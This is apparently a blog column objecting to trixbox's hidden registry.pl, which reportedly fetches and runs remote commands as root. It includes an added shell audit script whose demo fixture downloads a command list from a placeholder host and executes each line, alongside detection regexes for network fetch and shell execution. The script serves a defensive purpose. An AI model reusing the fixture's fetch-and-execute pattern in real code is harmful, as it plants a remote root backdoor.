You may have read that a user discovered last week that current trixbox systems, as recently as today, include a remotely-configurable BOT: a software program that can execute certain commands locally once it receives its instructions. Reportedly, trixbox’s registry.pl "phones home" to Fonality via the Internet at 3:41 a.m. each morning to get a list of Linux commands to run. It then executes those Linux commands on your server while you’re sleeping. If the assertions of trixbox end users are true, and we have no reason to believe otherwise, the existence of this remotely-configurable BOT was never disclosed to unsuspecting users, whether they were individuals or corporations. In fact, it doesn’t appear that even trixbox resellers were aware of the existence of the remotely-configurable BOT.
Let me hasten to add that Chris, Andrew, and Kerry have been good business partners of Nerd Vittles for years even though I’ve never personally met any of them. So I would never suspect that any one of them would use a tool like this for improper purposes. Our objection is more fundamental and goes to the existence of the tool itself and the failure to disclose it. Unfortunately, a remotely configurable BOT with root access privileges is a bit like giving someone a blank check… with your signature affixed. And it’s worse in this case because users had no notice that they were handing over the keys to their castle by installing and using trixbox. One can’t help wondering if Fonality management really grasps how dangerous such a system design is in this day and age. This isn’t about the commands that Fonality was executing. It’s about the commands that could be executed if this system were ever compromised. We have daily logs full of attempts to hack our systems using, you guessed it, remotely controlled BOTS.
We don’t for a minute believe that Chris Lyman and other senior management of Fonality knew about this in advance, but they certainly know now! The problem is that many programmers, in attempting to perfect the world’s finest software app, fail to consider what would happen if a tool like this one got into the wrong hands, for example the hands of a disgruntled employee. Unfortunately, just about every organization has at least one not-so-happy camper, and companies usually don’t know how dangerous such employees are until it’s too late. We obviously have no idea what safeguards Fonality may have put in place to monitor access and prevent abuse of this tool. For everyone’s sake in the Asterisk® community, we would hope LOADS OF THEM! A security breach at Fonality would basically hand over all of these trixbox systems for remote command execution as root. Or, if anyone’s DNS system is compromised, affected trixbox servers are now everyone’s worst nightmare. Hello!!!
As with many business decisions presented to organizations, the balancing act here is whether the benefits of collecting what have been represented to be marketing and usage statistics outweighed the risks if your absolute worst imaginable scenario came to pass. Merely revealing the existence of this tool made most folks shudder. And it’s still in operation. Remember, any Linux command or application could be executed with root privileges using this BOT. Take a look at the 25+ pages of comments on the trixbox forum, Google’s VoIP Users Conference, VOIPSEC, and now Slashdot if you have any doubts about the user reaction. Do we really think the crackers of the world can’t read? Is this what we want folks to remember when they hear about Asterisk?
Now imagine control of a tool like this getting into the wrong hands where someone could actually compromise the security of outside companies that knew nothing about its existence. All it took to execute commands on every newly-deployed trixbox server in the world was creation of a list of commands presumably stored on a server within the Fonality organization somewhere. Now you can appreciate how threatening a software design decision can be.
Having a hard-coded reporting mechanism that everyone is notified about up front was one thing, and that’s where this collection process began with trixbox 2. But it morphed into an open-ended, remotely-configurable BOT. And that is something quite different and downright dangerous. Suffice it to say, if we ever hope to seriously introduce Asterisk into the business community, there’s no room for BOTs in the equation, much less hidden ones. No business would knowingly tolerate an open-ended, remotely configurable BOT running on any server inside its corporate firewall, particularly one with the breadth of Linux applications at its disposal that one would normally find on trixbox systems.
This clever software should have been reviewed by senior management before it ever saw the light of day. The episode gives all of us a golden opportunity to stop and think about what we’re doing and what our fundamental obligations are to those who use our code. Hopefully, Fonality will turn this BOT off… permanently! The problem, of course, is that it’s hard to unring a bell. This BOT is already in the wild. Luckily there’s a very quick solution in this case. Here’s the command that should be added to tomorrow morning’s Fonality script: rm -f /var/adm/bin/registry.pl. We’ll all sleep better.
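Before removing anything, an administrator will want to confirm what is actually scheduled on the box. The audit below is an added example (not code from this article, from trixbox or from Fonality): it flags scripts that both fetch something over the network and hand data to a command interpreter, the pattern described above, and shows which cron entry schedules each one. The regexes and the demo files it builds are assumptions; the real system would be scanned by pointing it at /var/adm/bin and /etc/cron.d.

```shell
#!/bin/sh
# Added example, not code from the Nerd Vittles article or from trixbox/Fonality.
# Audits a directory of scripts for the pattern described above: a script that
# both fetches something over the network and hands data to a command
# interpreter, then shows which cron entry schedules it. It reports; it deletes
# nothing. The regexes are assumptions about typical Perl/shell spellings.
FETCH_RE='(LWP::|HTTP::Request|IO::Socket|curl |wget |lwp-request)'
EXEC_RE='(system\(|exec\(|`[^`]+`|\| *(sh|bash)( |$)|qx[({/])'

# Print the path of every regular file under $1 matching both patterns.
flag_phone_home_scripts() {
    find "$1" -type f 2>/dev/null | while read -r f; do
        if grep -Eq "$FETCH_RE" "$f" && grep -Eq "$EXEC_RE" "$f"; then
            printf '%s\n' "$f"
        fi
    done
}

# Print every file under cron directory $2 that names script $1.
cron_references() {
    grep -rlF -- "$1" "$2" 2>/dev/null
}

# Build a constructed demo tree (not real trixbox files) and print its path.
make_demo_dir() {
    d=$(mktemp -d)
    mkdir -p "$d/bin" "$d/cron.d"
    # Reporting-only script: sends stats, executes nothing it receives.
    cat > "$d/bin/stats.pl" <<'EOF'
use LWP::UserAgent;
LWP::UserAgent->new->post('http://example.invalid/stats', { ver => '2.6' });
EOF
    # Bot-style script: downloads a command list and runs each line.
    cat > "$d/bin/registry.pl" <<'EOF'
use LWP::Simple;
for my $c (split /\n/, get('http://example.invalid/cmds')) { system($c); }
EOF
    printf '41 3 * * * root %s/bin/registry.pl\n' "$d" > "$d/cron.d/registry"
    printf '%s\n' "$d"
}

# Run the audit over the demo tree: only registry.pl should be flagged.
demo=$(make_demo_dir)
flag_phone_home_scripts "$demo/bin" | while read -r s; do
    printf 'fetch-and-execute script: %s\n' "$s"
    cron_references "$s" "$demo/cron.d" | sed 's/^/  scheduled by: /'
done
rm -rf "$demo"
```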
We hope everyone in the Asterisk development community will make a pledge to be open about the existence and scope of any future data collection processes associated with Asterisk offerings. Then users can make an informed choice on whether to use your software. A new trixbox forum member put it this way:
There is an understanding between users and developers. The understanding is often tacit but is nonetheless there. The understanding goes, "I will be executing something you wrote. I do not have the time/ability to check it all, but as professionals, I expect you to behave in a manner befitting that trust." –Minupla
We couldn’t have said it better. As for our own software, we want to be crystal clear: No Remotely-Configurable BOTs Ever! They have no legitimate purpose when weighed against the very substantial security risks they pose to all of us.
Full Disclosure. With the help of some very talented partners, Nerd Vittles now has an Asterisk-based PBX offering of its own, PBX in a Flash. It arguably "competes" against Fonality’s trixbox ce even though both offerings are free for the taking. Having written over 100 columns touting the beauties of trixbox, we felt some obligation to warn our users who may have upgraded to a more recent version of Fonality’s software. You may also want to review this article from Philippe Lindheimer, the lead developer of FreePBX.